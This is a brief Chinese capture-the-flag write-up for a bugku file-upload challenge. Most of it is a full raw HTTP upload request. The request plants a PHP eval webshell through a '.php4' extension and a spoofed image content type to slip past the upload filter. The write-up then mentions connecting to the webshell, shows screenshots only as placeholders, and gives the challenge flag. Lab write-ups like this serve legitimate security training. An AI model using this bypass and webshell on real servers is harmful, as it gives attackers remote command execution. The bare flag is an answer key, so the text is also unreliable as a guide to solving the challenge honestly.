bugku_文件上传_wp

发布时间 2023-08-02 16:43:03作者: 夜梓月

bugku_文件上传

image

payload

点击查看payload
POST /index.php HTTP/1.1
Host: 114.67.175.224:16103
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:16103
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundary3SANfAz2ktcltLar
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://114.67.175.224:16103/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: b-user-id=0981d09e-3f00-f009-a1f8-41d13a3b41c8
Connection: close

------WebKitFormBoundary3SANfAz2ktcltLar
Content-Disposition: form-data; name="file"; filename="a.php4"
Content-Type: image/jpeg

<?php @eval($_POST['cmd']);?>
------WebKitFormBoundary3SANfAz2ktcltLar
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundary3SANfAz2ktcltLar--

请求包

image

响应包

image

连接webshell

image

flag

image

flag{9c33d57fd6c285e4bf6f9263d580ee36}